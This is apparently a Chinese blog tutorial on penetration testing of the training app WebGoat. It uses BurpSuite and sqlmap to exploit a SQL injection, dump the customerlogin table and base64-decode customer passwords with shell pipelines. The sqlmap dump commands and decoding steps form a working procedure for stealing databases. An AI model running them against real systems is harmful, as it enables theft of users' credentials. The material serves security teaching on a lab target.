黑客如何在渗透测试过程中导出网站数据库?
作者:FancyPig | 发布时间: | 更新时间:
相关阅读
data-postsbox="{"id":16195,"title":"【零基础学渗透】SQL注入的常见方式汇总","author":"Sec-Labs","author_id":10015,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2022/05/20220519074409830.png","cover_video":"","views":5636,"comment_count":378,"category":"cybersecurity","is_forum_post":false}">{"id":16195,"title":"【零基础学渗透】SQL注入的常见方式汇总","author":"Sec-Labs","author_id":10015,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2022/05/20220519074409830.png","cover_video":"","views":5636,"comment_count":378,"category":"cybersecurity","is_forum_post":false}
data-postsbox="{"id":11474,"title":"【零基础学渗透】工具篇——BurpSuite","author":"Sec-Labs","author_id":10015,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2022/03/20220313155529975.png","cover_video":"","views":9400,"comment_count":663,"category":"cybersecurity","is_forum_post":false}">{"id":11474,"title":"【零基础学渗透】工具篇——BurpSuite","author":"Sec-Labs","author_id":10015,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2022/03/20220313155529975.png","cover_video":"","views":9400,"comment_count":663,"category":"cybersecurity","is_forum_post":false}
data-postsbox="{"id":16365,"title":"使用SQLMAP完成sqli-labs全攻略(1-25关)","author":"FancyPig","author_id":1,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2022/05/20220526004018571.png","cover_video":"","views":6251,"comment_count":3,"category":"cybersecurity","is_forum_post":false}">{"id":16365,"title":"使用SQLMAP完成sqli-labs全攻略(1-25关)","author":"FancyPig","author_id":1,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2022/05/20220526004018571.png","cover_video":"","views":6251,"comment_count":3,"category":"cybersecurity","is_forum_post":false}
data-postsbox="{"id":5065,"title":"SQLmap注入攻击学习笔记","author":"iboy","author_id":8091,"cover_image":"","cover_video":"","views":1518,"comment_count":2,"category":"cybersecurity","is_forum_post":false}">{"id":5065,"title":"SQLmap注入攻击学习笔记","author":"iboy","author_id":8091,"cover_image":"","cover_video":"","views":1518,"comment_count":2,"category":"cybersecurity","is_forum_post":false}
data-postsbox="{"id":269,"title":"【DVWA全攻略】使用SQLMAP完成DVWA SQL Injection实验","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":7266,"comment_count":3,"category":"cybersecurity","is_forum_post":false}">{"id":269,"title":"【DVWA全攻略】使用SQLMAP完成DVWA SQL Injection实验","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":7266,"comment_count":3,"category":"cybersecurity","is_forum_post":false}
data-postsbox="{"id":195,"title":"如何使用sqlmap? sqlmap的常用命令","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":3077,"comment_count":0,"category":"cybersecurity","is_forum_post":false}">{"id":195,"title":"如何使用sqlmap? sqlmap的常用命令","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":3077,"comment_count":0,"category":"cybersecurity","is_forum_post":false}
视频讲解
黑客如何在渗透测试过程中,发现SQL注入漏洞,最终完成数据库导出,也就是我们常说的“脱库”,本期视频将详细讲解
- 使用BurpSuite抓包,导出请求包
- 使用SQLMAP调用请求包,并完成自动化的SQL注入
- 使用SQLMAP导出数据库
- 最终使用特定解码方式找到所有账户密码
图文讲解
首先,我们打开burpsuite的插件foxyproxy,设置为burpsuite代理的端口8080
打开burpsuite,确保已经开启了拦截
回到网页点击提交按钮
这时我们可以看到拦截的请求,可以将其复制下来
通过echo可以输出为request.txt文件,当然你也可以自己手动创建
接下来我们可以通过sqlmap来自动注入刚才的请求
sqlmap -r request.txt
发现可以进行注入,我们就可以导出数据库了
sqlmap -r request.txt --dbs
下面是我们查找到的数据库,我们这里的目标数据库是webgoat_coins下面的表和数据
继续输入下面的命令
sqlmap -r request.txt -D webgoat_coins --tables
然后我们可以找到webgoat_coins数据库下面的表,我们猜测customerlogin可能存储了客户的信息
我们尝试导出customerlogin表下的数据
sqlmap -r request.txt -D webgoat_coins -T customerlogin --dump
可以看到客户的电子邮件、账户、密码、安全问题等等信息,我们分析密码发现它的长度不是统一的,因此不是哈希类型,因此可能只是做了某种编码,大概率是base64
我们以其中一个为例,进行解码
echo "MTIzNDU2" | base64 --decode我们发现密码居然是123456
接下来的就是批量进行解码了,如果你熟悉|管道命令,可以很轻松搞定
我们可以先将其用同样的方式保存到password.txt文件中
然后输入下面的命令
awk '{print $8}' password.txt | base64 --decode我们发现出现了invalid input的报错
经过分析
我们发现是密码前的|竖线对此产生的影响
最终我们通过tr删除了其中的|竖线,输入下面的命令
awk '{print $8}' password.txt | tr -d '|' | base64 --decode
当然,你还可以使用其他的管道命令完成自动换行,这里不再赘述!
到此密码的破解也算完成了,是不是感觉今天学到了很多呢?